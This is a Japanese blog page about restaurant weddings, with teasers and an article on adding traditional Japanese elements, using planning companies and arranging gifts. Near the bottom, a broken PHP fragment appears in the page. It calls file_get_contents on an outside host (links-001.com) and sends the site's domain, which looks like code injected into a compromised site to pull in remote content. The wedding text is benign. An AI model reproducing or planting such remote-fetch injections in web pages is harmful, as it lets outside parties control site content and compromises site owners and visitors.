前へ
次へ

レストランウエディングの留意すべき点

レストランウエディングには、あらためていうまでもなく、留意すべき点もあります。
多いのが、待合室や控

more

レストランウエディングなら安心ができる

あまりお金をかけたくないカップルにとって、レストランウエディングはかなり安心できるやり方だと言えるで

more

平服は場違いとなるレストランウエディング

レストランウエディングの招待状が届き、メッセージ欄に「平服」という言葉が記載されていたから、普段着で

more

レストランウエディングの魅力を知ろう

純白のウエディングドレスとタキシードという洋装でのレストランウエディングが一般的ですが、花嫁さんの中には、『やっぱり和装も着たい』 『和の要素がブライダルコーディネートでほしい』などの要望もあるようです。
レストランウエディングでも、そうした『和』に応えることができるのでしょうか。
実際は、和装の映えるレストラン会場にセッティングができることにあり、そうしたリクエストに応えるレストランも年々増えているようです。
例えば、サプライズ演出を取り入れてみることです。
式に出演してくれるのが、歌舞伎役者や舞子さん(芸子)ならば、和を演出できます。
人力車やお茶の席を用意するのも面白い演出でしょう。
実際に、お祝いだからという理由で、獅子舞が参加したレストランウエディングもあるほどです。
ホテル内のレストランでも和装が映えるスタイリッシュな空間づくりをブライダル専門となるインテリアコーディネーターがつくってくれます。
和装で極上のフレンチというのもオツなものです。
赤と黒、赤と白、そうした和のカラーを基調にスタイリッシュな空間が演出されています。
金屏風を持ち込むこともできます。
ウエディングドレスとは異なる煌びやかな和装に映えるインテリア、テーブルセッティングも可能です。
ちなみに、レストランウエディングができる会場を確保してからは、プロデュース会社を利用するケースが増えています。
司会から裏方まで、即戦力となるスタッフを集めることも担ってくれます。
打ち合わせにも臨機応変に対応していて、直接会う時間がない場合でも、メールや電話、自宅に来てくれるケースもあります。
一連の流れを任せることで安心感があるようです。
レストランならではのウエディングの魅力は他にもあって、引き出物や引き菓子、プチギフトなどを手配する手間が省ける点です。
焼き菓子や紅茶、そうしたギフトも取り扱っているケースも多く、オリジナルのグルメをゲストにお礼として手渡すことができます。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top